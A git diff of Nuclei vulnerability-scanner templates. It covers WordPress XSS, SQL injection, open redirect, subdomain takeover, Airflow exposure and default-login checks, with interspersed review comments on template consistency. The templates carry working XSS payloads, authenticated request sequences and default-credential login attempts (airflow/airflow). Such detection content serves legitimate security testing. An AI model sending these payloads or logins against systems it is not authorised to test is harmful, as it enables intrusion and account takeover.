epss-score: 0.00064 - epss-percentile: 0.26619 + epss-percentile: 0.26189 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +25,7 @@ info: vendor: 10web product: image_optimizer framework: wordpress - tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated + tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web http: - raw: 
@@ -47,4 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Image optimizer")' condition: and -# digest: 4a0a004730450220343a75b628b5fef9712f71f06ef15b621575070106b8ce7e976fbe5008cc05f502210092424946512ea282acf12aa79206345e595a2de2598d048b2a66e80c7aab82ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2130.yaml b/nuclei-templates/CVE-2023/CVE-2023-2130.yaml index 3e82965b46..ccc03dcaa9 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2130.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2130.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: 
@@ -20,14 +22,14 @@ info: cve-id: CVE-2023-2130 cwe-id: CWE-89 epss-score: 0.01554 - epss-percentile: 0.85749 + epss-percentile: 0.85779 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: cve,cve2023,sqli,purchase-order-management-system + tags: cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project http: - method: GET @@ -42,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "Supplier Name")' condition: and -# digest: 4a0a004730450220778e15ff18570983f0074ee5343402dc7ae10a7f7a9147a6b538420418e942d5022100a315544cac94a5782df8b2f3fd8c4a0a347e4c1ac3d553c9cfd4e5ff09b71bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207610615b4d86f3776d899e52606e2d73d1e13ab8f1be83473221d6e08f7d7ac6022100c166cf185ded4ffb6629ece50af08cbb3480f06e618e633086ebf6bf5b2de618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2178.yaml b/nuclei-templates/CVE-2023/CVE-2023-2178.yaml index a46ead2151..3731dd9ca1 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2178.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2178.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32968 + epss-percentile: 0.3232 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: aajoda product: aajoda_testimonials framework: wordpress - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated + tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda http: - raw: @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and -# digest: 490a0046304402204478b4dc4843046c76373b537cc29129d7e8466700d586ca1ba0091b84b27cca022055cc845f24583a7eca0cd412bb0d84013c78c6595ba5b995ead3f9bdee2beff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2224.yaml b/nuclei-templates/CVE-2023/CVE-2023-2224.yaml index f9ab0eca4d..c9390d770b 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2224.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2224.yaml 
@@ -1,24 +1,32 @@ id: CVE-2023-2224 info: - name: Seo By 10Web < 1.2.7 - Admin+ Stored XSS + name: Seo By 10Web < 1.2.7 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). reference: - https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992 - - https://nvd.nist.gov/vuln/detail/CVE-2023-2224 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2224 - https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-2224 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 cve-id: CVE-2023-2224 + cwe-id: CWE-79 + epss-score: 0.00102 + epss-percentile: 0.41348 + cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated + max-request: 3 + vendor: 10web + product: seo + framework: wordpress + tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -26,26 +34,38 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | - POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=1 HTTP/1.1 + GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1 + Host: {{Hostname}} + - | + POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1 Host: {{Hostname}} - task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28%22XSS%22%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo=b16eae563d&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1 + 
task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1 - cookie-reuse: true matchers-condition: and matchers: - type: word - part: body + part: body_3 words: - - "value=\"\">

The page you're looking for doesn't exist. diff --git a/nuclei-templates/Other/aftership-takeover-206.yaml b/nuclei-templates/Other/aftership-takeover-206.yaml new file mode 100644 index 0000000000..cda98eeb27 --- /dev/null +++ b/nuclei-templates/Other/aftership-takeover-206.yaml @@ -0,0 +1,16 @@ +id: aftership-takeover +info: + name: Aftership Takeover Detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Oops.

The page you're looking for doesn't exist. diff --git a/nuclei-templates/Other/age-gate-open-redirect-207.yaml b/nuclei-templates/Other/age-gate-open-redirect-207.yaml index e01165aacc..28d1aee39d 100644 --- a/nuclei-templates/Other/age-gate-open-redirect-207.yaml +++ b/nuclei-templates/Other/age-gate-open-redirect-207.yaml @@ -15,21 +15,22 @@ info: cwe-id: CWE-601 metadata: verified: true + max-request: 1 tags: agegate,unauth,wpscan,packetstorm,wp-plugin,redirect,wordpress,wp -requests: +http: - method: POST path: - '{{BaseURL}}/wp-admin/admin-post.php' body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://interact.sh + headers: Content-Type: application/x-www-form-urlencoded - matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/18 +# digest: 490a00463044022010842395d91a67322afc83b745215293ca3076f7a2bc96b4af6bd91881a8679302204cc73c13948bf3e96b01bb99e1f04d4871040ca8f3a6b877b0e2bf4102d829b5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/age-gate-xss.yaml b/nuclei-templates/Other/age-gate-xss.yaml index a7a1880aac..f2d5ce04a8 100644 --- a/nuclei-templates/Other/age-gate-xss.yaml +++ b/nuclei-templates/Other/age-gate-xss.yaml @@ -13,9 +13,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + metadata: + max-request: 2 tags: xss,authenticated,age-gate,wpscan,wordpress,wp-plugin,wp -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
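Review bot: This newly added template uses the legacy `requests:` key while the age-gate-open-redirect and age-gate-xss hunks in the same commit rewrite `requests:` to `http:`; the other files added here — aha-takeover-216, aims-password-mgmt-client, aims-password-portal-222, airflow-configuration-exposure, airflow-debug and airflow-default-login-236 — have the same inconsistency. Adding files in the deprecated form inside a commit that migrates away from it only creates more to migrate on the next pass, so write `http:` here. The matcher is a single body phrase with no status check or `matchers-condition`, so any page that happens to contain that text fires; the hunk text also appears HTML-stripped in this view, so the exact marker string should be checked against the file.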
@@ -23,12 +25,10 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=age-gate&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -46,5 +46,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 4a0a0047304502210091c747826adfc53d902e7139401dc29159a77894a19ea867a31130881032612d02206975a478dd1b02d4057502174622b9555eef56c56d1c6e41b4f87c7b9d04155c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/age-identity-secret-key.yaml b/nuclei-templates/Other/age-identity-secret-key.yaml index eb87ea96de..8dba4898ef 100644 --- a/nuclei-templates/Other/age-identity-secret-key.yaml +++ b/nuclei-templates/Other/age-identity-secret-key.yaml @@ -10,7 +10,8 @@ info: - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: verified: true - tags: age-encryption,file,token + tags: file,keys,age-encryption,token + file: - extensions: - all @@ -20,5 +21,4 @@ file: part: body regex: - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' - -# digest: 4a0a0047304502201a1f14a0a6f72bbd8e353c6db3647c596ccee294516249b42df3757df4fa56b7022100fe1dc8b4a2e83bd842dced9fff217732d392b28eb0dd027f7e6f75f5aff9d634:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100967a33608a1ecaa232719a64590ae179e82473d9ff9960e1294033f41dcfafb3022011659ec4586dff37d9381700897e858d37c2b363d718315d96fa9db721bc7123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/age-recipient-public-key.yaml b/nuclei-templates/Other/age-recipient-public-key.yaml index 4e4f7ba2e9..2a4c870b55 100644 --- a/nuclei-templates/Other/age-recipient-public-key.yaml +++ b/nuclei-templates/Other/age-recipient-public-key.yaml 
@@ -10,7 +10,8 @@ info: - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: verified: true - tags: age-encryption,file,token + tags: file,keys,age-encryption,token + file: - extensions: - all @@ -20,5 +21,4 @@ file: part: body regex: - '\bage1[0-9a-z]{58}\b' - -# digest: 4a0a004730450221009fb14853721aa355f4dff9b164fd098ba99f8c579e3ef82325210e6fbbb8918f02203f2a50f4e91298e867107a4af77f80f70cbc2a5c7cad4fa4133d2d7233d51dda:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008efb372243352ac7767832750aa04221c747bfb407e0d3599f6716055832807402210084c3968cf28f080a9a1ef95e6cd8a9029e85c7fa0d051df56217ecc16d6aafb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/agilecrm-takeover.yaml b/nuclei-templates/Other/agilecrm-takeover-209.yaml similarity index 100% rename from nuclei-templates/Other/agilecrm-takeover.yaml rename to nuclei-templates/Other/agilecrm-takeover-209.yaml diff --git a/nuclei-templates/Other/aha-takeover-214.yaml b/nuclei-templates/Other/aha-takeover-214.yaml deleted file mode 100644 index 649b36b6e5..0000000000 --- a/nuclei-templates/Other/aha-takeover-214.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: aha-takeover -info: - name: Aha Takeover Detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - There is no portal here ... sending you back to Aha! diff --git a/nuclei-templates/Other/aha-takeover-216.yaml b/nuclei-templates/Other/aha-takeover-216.yaml new file mode 100644 index 0000000000..c861ce24c0 --- /dev/null +++ b/nuclei-templates/Other/aha-takeover-216.yaml 
@@ -0,0 +1,16 @@
+id: aha-takeover
+info:
+ name: Aha Takeover Detection
+ author: pdteam
+ severity: high
+ reference:
+ - https://github.com/EdOverflow/can-i-take-over-xyz
+ tags: takeover
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers:
+ - type: word
+ words:
+ - There is no portal here ... sending you back to Aha!
diff --git a/nuclei-templates/Other/AIC-leakage.yaml b/nuclei-templates/Other/aic-leakage.yaml
similarity index 100%
rename from nuclei-templates/Other/AIC-leakage.yaml
rename to nuclei-templates/Other/aic-leakage.yaml
diff --git a/nuclei-templates/Other/aims-password-mgmt-client-219.yaml b/nuclei-templates/Other/aims-password-mgmt-client-219.yaml
deleted file mode 100644
index a178296f3f..0000000000
--- a/nuclei-templates/Other/aims-password-mgmt-client-219.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: aims-password-mgmt-client
-
-info:
- name: Aims Password Management Client Detect
- author: iamthefrogy
- severity: info
- tags: panel,aims
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/aims/ps/"
-
- matchers:
- - type: word
- words:
- - "Avatier Corporation"
diff --git a/nuclei-templates/Other/aims-password-mgmt-client.yaml b/nuclei-templates/Other/aims-password-mgmt-client.yaml
new file mode 100644
index 0000000000..c6f768a5c9
--- /dev/null
+++ b/nuclei-templates/Other/aims-password-mgmt-client.yaml
@@ -0,0 +1,27 @@
+id: aims-password-mgmt-client
+
+info:
+ name: Aims Password Management Client Detect
+ author: iamthefrogy
+ description: An Aims Password management client was detected.
+ severity: info
+ tags: panel,aims
+ reference:
+ - https://www.avatier.com/products/identity-management/password-management/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0.0
+ cve-id:
+ cwe-id: CWE-200
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/aims/ps/"
+
+ matchers:
+ - type: word
+ words:
+ - "Avatier Corporation"
+
+# Enhanced by mp on 2022/03/21
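Review bot: The new aims-password-mgmt-client.yaml adds `cvss-score: 0.0` and an empty `cve-id:` to a panel-detection template, while the aircube-dashboard-panel and aircube-login hunks in this same commit delete exactly that `cvss-score: 0.0` line; an empty `cve-id:` parses as a YAML null, which template validators typically reject. Drop both lines and keep only `cvss-metrics:` and `cwe-id:` under `classification:`. The trailing `# Enhanced by mp on 2022/03/21` is the comment form this commit replaces with `# digest:` lines elsewhere, so the file will be touched again on the next run.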
diff --git a/nuclei-templates/Other/aims-password-portal-222.yaml b/nuclei-templates/Other/aims-password-portal-222.yaml
new file mode 100644
index 0000000000..eb21d8e0eb
--- /dev/null
+++ b/nuclei-templates/Other/aims-password-portal-222.yaml
@@ -0,0 +1,22 @@
+id: aims-password-portal
+
+info:
+ name: AIMS Password Management Portal
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6576
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/aims/ps/default.aspx'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Password Management Client'
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/aims-password-portal-224.yaml b/nuclei-templates/Other/aims-password-portal-224.yaml
deleted file mode 100644
index 800dd21cad..0000000000
--- a/nuclei-templates/Other/aims-password-portal-224.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: aims-password-portal
-
-info:
- name: AIMS Password Management Portal
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/6576
- tags: panel,aims
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/aims/ps/default.aspx'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Password Management Client'
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/aircube-dashboard-panel.yaml b/nuclei-templates/Other/aircube-dashboard-panel.yaml
index 8c6228dfec..76e6a57eea 100644
--- a/nuclei-templates/Other/aircube-dashboard-panel.yaml
+++ b/nuclei-templates/Other/aircube-dashboard-panel.yaml
@@ -7,14 +7,14 @@ info:
 description: airCube Dashboard login panel was detected.
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
 cwe-id: CWE-200
 metadata:
- verified: true
+ max-request: 1
 shodan-query: http.title:"AirCube Dashboard"
+ verified: true
 tags: panel,aircube

-requests:
+http:
 - method: GET
 path:
 - '{{BaseURL}}'
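Review bot: The added aims-password-portal-222.yaml is the deleted aims-password-portal-224.yaml with one difference, `tags: panel` instead of `tags: panel,aims`, so the net effect of the pair is to lose the `aims` tag that the sibling aims-password-mgmt-client template still carries; keep `tags: panel,aims`. Both copies declare `id: aims-password-portal`, so if any other copy of that id survives in the tree the engine will report a duplicate. The numeric suffix in the file name reads as a de-duplication artefact rather than a meaningful name, and the file keeps the legacy `requests:` key that this commit migrates to `http:` in the aircube hunk right below it.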
@@ -29,5 +29,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/03 +# digest: 4a0a00473045022100fd6c23985fea3ea42e77ba203a8fce9e43333562673cb0c2706f59e22201f712022005c769ad7b436b5b9b0b4d507d901e3d8c2170ddad219dbafed8d890899a7dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aircube-login.yaml b/nuclei-templates/Other/aircube-login.yaml index 347e6fa2d8..e0dee7f194 100644 --- a/nuclei-templates/Other/aircube-login.yaml +++ b/nuclei-templates/Other/aircube-login.yaml @@ -7,14 +7,14 @@ info: description: airCube login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: http.favicon.hash:1249285083 + verified: true tags: panel,aircube,ubiquiti -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -29,5 +29,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100a0cde8a94d9a87777fa4576699697df9a9bc6161482e374b8c93950042d73e6e02206095562164b4e93fd6ab403958fceedb86401484f02abf53c70b62888d428e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-api-exposure.yaml b/nuclei-templates/Other/airflow-api-exposure.yaml index 4416e443ff..3a5986bb55 100644 --- a/nuclei-templates/Other/airflow-api-exposure.yaml +++ b/nuclei-templates/Other/airflow-api-exposure.yaml @@ -4,6 +4,7 @@ info: name: Apache Airflow API Exposure / Unauthenticated Access author: pd-team severity: medium + tags: apache,airflow,unauth requests: - method: GET diff --git a/nuclei-templates/Other/airflow-configuration-exposure-230.yaml b/nuclei-templates/Other/airflow-configuration-exposure-230.yaml deleted file mode 100644 index a715bba8ac..0000000000 --- a/nuclei-templates/Other/airflow-configuration-exposure-230.yaml +++ /dev/null 
@@ -1,18 +0,0 @@ -id: airflow-configuration-exposure - -info: - name: Apache Airflow Configuration Exposure - author: pdteam - severity: medium - tags: exposure,config,airflow,apache - -requests: - - method: GET - path: - - '{{BaseURL}}/airflow.cfg' - matchers: - - type: word - words: - - '[core]' - - '[api]' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-configuration-exposure.yaml b/nuclei-templates/Other/airflow-configuration-exposure.yaml new file mode 100644 index 0000000000..f4ae81eff2 --- /dev/null +++ b/nuclei-templates/Other/airflow-configuration-exposure.yaml @@ -0,0 +1,16 @@ +id: airflow-configuration-exposure +info: + name: Apache Airflow Configuration Exposure + author: pdteam + severity: medium + tags: exposure,config,airflow,apache +requests: + - method: GET + path: + - '{{BaseURL}}/airflow.cfg' + matchers: + - type: word + words: + - '[core]' + - '[api]' + condition: and diff --git a/nuclei-templates/Other/airflow-debug-233.yaml b/nuclei-templates/Other/airflow-debug-233.yaml deleted file mode 100644 index dc6f4a4a58..0000000000 --- a/nuclei-templates/Other/airflow-debug-233.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: airflow-debug - -info: - name: Airflow Debug Trace - author: pdteam - severity: low - tags: apache,airflow,fpd - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/airflow/login" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "

Ooops.

" - - "Traceback (most recent call last)" - condition: and - - - type: status - status: - - 500 \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-debug.yaml b/nuclei-templates/Other/airflow-debug.yaml new file mode 100644 index 0000000000..7e88c457d2 --- /dev/null +++ b/nuclei-templates/Other/airflow-debug.yaml @@ -0,0 +1,29 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + metadata: + verified: true + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,fpd + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-default-credentials.yaml b/nuclei-templates/Other/airflow-default-credentials.yaml index 50bcb9d651..17e55159e8 100644 --- a/nuclei-templates/Other/airflow-default-credentials.yaml +++ b/nuclei-templates/Other/airflow-default-credentials.yaml @@ -1,12 +1,10 @@ id: airflow-default-credentials - info: name: Apache Airflow Default Credentials author: pdteam severity: critical tags: airflow,default-login reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - requests: - raw: - | @@ -17,7 +15,6 @@ requests: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 - - | POST /admin/airflow/login HTTP/1.1 Host: {{Hostname}} @@ -31,7 +28,6 @@ requests: Connection: close username=airflow&password=airflow&_csrf_token={{csrf_token}} - extractors: - type: regex name: csrf_token @@ -40,7 +36,6 @@ requests: internal: true regex: - 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">' - cookie-reuse: true matchers-condition: and matchers: @@ -50,12 +45,10 @@ requests: - "/admin/" part: header condition: and - - type: word words: - 'You should be redirected automatically to target URL: /admin/' part: body - - type: status status: - 302 diff --git a/nuclei-templates/Other/airflow-default-login-236.yaml b/nuclei-templates/Other/airflow-default-login-236.yaml new file mode 100644 index 0000000000..7895e5fa0f --- /dev/null +++ b/nuclei-templates/Other/airflow-default-login-236.yaml 
@@ -0,0 +1,57 @@ +id: airflow-default-login +info: + name: Apache Airflow Default Login + author: pdteam + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + metadata: + shodan-query: title:"Sign In - Airflow" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: airflow,default-login,apache +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + attack: pitchfork + payloads: + username: + - airflow + password: + - airflow + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + group: 1 + internal: true + regex: + - 'type="hidden" value="(.*?)">' + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_1, "Sign In - Airflow")' + - 'contains(all_headers_2, "session=.")' + - 'status_code_2 == 302' + condition: and + - type: word + words: + - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-default-login.yaml b/nuclei-templates/Other/airflow-default-login.yaml deleted file mode 100644 index 772e1ffd78..0000000000 --- a/nuclei-templates/Other/airflow-default-login.yaml +++ /dev/null 
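Review bot: The CSRF extractor `'type="hidden" value="(.*?)">'` in airflow-default-login-236 captures whatever hidden input appears first on `/login/`, not specifically the CSRF field, so any other hidden input on the page yields a wrong token and a silent false negative; the sibling `airflow-default-credentials.yaml` in this same commit anchors on `'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">'` and this template should anchor the same way. The `Referer: {{BaseURL}}/admin/airflow/login` on the POST also names the legacy login path while the request itself goes to `/login/`; `Referer: {{BaseURL}}/login/` keeps the two consistent. Note that this file is the content of the removed `airflow-default-login.yaml` with blank lines stripped and `metadata` reordered, so the loose regex predates this commit rather than being introduced by it.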
